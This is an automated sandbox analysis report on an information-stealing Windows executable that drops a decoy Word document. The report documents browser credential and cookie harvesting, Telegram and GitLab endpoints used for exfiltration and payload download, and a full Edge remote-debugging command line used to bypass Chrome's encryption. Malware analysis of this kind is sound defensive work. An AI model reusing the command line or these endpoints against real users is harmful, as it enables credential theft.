      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Yara detected Telegram Recon
      Source: Yara matchFile source: StL9joVVcT.exe, type: SAMPLE
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944FBFF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFD944FBFF0

      Stealing of Sensitive Information

      barindex
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeDirectory queried: C:\Users\Public\Documents\638724340810195450\FilesJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeDirectory queried: C:\Users\Public\Documents\638724340810195450\Files\DJump to behavior
      Source: Yara matchFile source: Process Memory Space: StL9joVVcT.exe PID: 4924, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Attempt to bypass Chrome Application-Bound Encryption
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		1
      OS Credential Dumping      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Query Registry      		Remote Desktop Protocol11
      Data from Local System      		1
      Remote Access Software      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager11
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      Process Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials11
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      StL9joVVcT.exe1%VirustotalBrowse
      StL9joVVcT.exe3%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\e_sqlite3.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://schemas.openxmlform0%Avira URL Cloudsafe
      http://schemas.openxmlf0%Avira URL Cloudsafe
      http://www.google.20%Avira URL Cloudsafe
      http://schemas.op0%Avira URL Cloudsafe
      http://schemas.openxml0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      google.com
      		142.250.185.78
      		truefalse
        		high
        gitlab.com
        		172.65.251.78
        		truefalse
          		high
          www.google.com
          		142.250.185.228
          		truefalse
            		high
            api.ipify.org
            		104.26.12.205
            		truefalse
              		high
              ip-api.com
              		208.95.112.1
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                  		high
                  https://www.google.com/false
                    		high
                    https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falsefalse
                      		high
                      https://api.ipify.org/false
                        		high
                        https://google.com/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mono/linker/issues/1731StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                            		high
                            https://github.com/mono/linker/issues/2025StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://schemas.openxmlformStL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2443899460.000002357FF12000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2404886604.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2444915896.000002357FF17000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2402988198.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2450037293.000002357FF1A000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/botStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://gitlab.com/-/sandbox/;StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://photos.google.com/?tab=wq&pageId=noneStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/intlStL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://snowplow.trx.gitlab.netStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://collector.prd-278964.gl-product-analytics.comStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://ip-api.com/json/yStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://news.google.com/?tab=wnStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://ip-api.com/json/8.46.123.189PStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC002000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    http://www.google.com:443/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC205000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC25D000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC21A000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2B4000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC194000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.openxmlfStL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2443899460.000002357FF12000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2404886604.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2444915896.000002357FF17000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2402988198.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2450037293.000002357FF1A000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/nativeaot-compatibilityStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        		high
                                                        https://www.google.com/finance?tab=weStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/botiStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                              		high
                                                              https://github.com/ericsink/SQLitePCL.rawdStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                		high
                                                                https://www.blogger.com/?tab=wjStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.recaptcha.net/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/imghp?hl=en&tab=wiStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.com/shopping?hl=en&source=og&tab=wfStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/soap/encoding/StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.microStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                            		high
                                                                            https://api.gofile.io/serversStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                              		high
                                                                              https://github.com/icsharpcode/SharpZipLibStL9joVVcT.exefalse
                                                                                		high
                                                                                https://aka.ms/nativeaot-compatibilityyStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                  		high
                                                                                  https://new-sentry.gitlab.netStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://aka.ms/dotnet-illink/comStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/FStL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB86C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.google.com/preferences?hl=enStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB8B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.youtube.com/?tab=w1StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.google.com/history/optout?hl=enStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://gitlab.com/admin/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://books.google.com/?hl=en&tab=wpStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://gitlab.com/-/speedscope/index.htmlStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/nativeaot-compatibilityYStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/recaptcha/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.newtonsoft.com/jsonschemaStL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/dotnet/runtime/issues/50820StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              		high
                                                                                                              https://calendar.google.com/calendar?tab=wcStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/ericsink/SQLitePCL.rawStL9joVVcT.exefalse
                                                                                                                  		high
                                                                                                                  http://schemas.openxmlStL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://urn.to/r/sds_see12https://urn.to/r/sds_see2StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.sqlite.org/rescode.htmlStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.google.com/intl/en/about/products?tab=whStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB8B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://github.com/mono/linker/pull/2125.StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/mono/linker/issues/1895vUsingStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://csp.withgoogle.com/csp/gws/other-hpStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://system.data.sqlite.org/XStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.newtonsoft.com/jsonStL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.google.com/document/?usp=docs_alcStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://gitlab.comStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schema.org/WebPageStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://github.com/dotnet/runtimeStL9joVVcT.exefalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/webhp?tab=wwStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://api.ipify.orgStL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lh3.googleusercontent.com/ogw/deStL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://ip-api.com:80/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://aka.ms/dotnet-warnings/StL9joVVcT.exefalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/dotnet/efcoreStL9joVVcT.exefalse
                                                                                                                                                        		high
                                                                                                                                                        https://maps.google.com/maps?hl=en&tab=wlStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://gitlab.com/assets/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://ip-api.com/json/StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://gitlab.com:443/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/iStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://aka.ms/serializationformat-binary-obsoleteStL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://aka.ms/binaryformatterStL9joVVcT.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://apis.google.comStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC463000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC431000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4C3000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://sentry.gitlab.netStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://api.ipify.org:443/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/soap/encoding/YStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://www.google.com/mobile/?hl=en&tab=wDStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://github.com/JamesNK/Newtonsoft.JsonStL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    		high
